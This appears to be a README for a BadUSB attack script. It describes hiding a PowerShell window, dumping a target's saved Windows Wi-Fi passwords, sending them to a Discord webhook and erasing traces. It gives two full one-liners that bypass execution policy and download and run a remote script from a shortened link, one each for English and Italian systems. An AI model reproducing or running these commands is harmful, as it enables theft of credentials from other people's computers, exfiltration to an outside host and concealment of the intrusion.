Files
2025-07-04 07:09:11 +00:00
..
2025-07-04 07:09:11 +00:00
2025-07-04 07:09:11 +00:00
2025-07-04 07:09:11 +00:00
2025-07-04 07:09:11 +00:00
2025-07-04 07:09:11 +00:00

WLAN Windows Password - BadUSB

A script used to stole target WLAN Passwords.

Hits

Category: WLAN, Credentials


Description

A script used to stole target WLAN Passwords.

Opens PowerShell hidden, grabs wlan passwords, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.

Then it cleans up traces of what you have done after.

Getting Started

Dependencies

  • An internet connection
  • Windows 10,11

Executing program

  • Plug in your device
  • Invoke 2 netsh commands
  • Invoke-WebRequest will be entered in the Run Box to send the content

ENG 🇺🇸

powershell -w h -ep bypass $discord='<your_webhook_here>';irm bit.ly/WindowsWiFiPasswordsENG | iex

ITA 🇮🇹

powershell -w h -ep bypass $discord='<your_webhook_here>';irm bit.ly/WindowsWiFiPasswordsITA | iex

You must put your Discord webhook into the variable $discord='<your-webhook-here>'

Credits

Aleff :octocat:


Github

Linkedin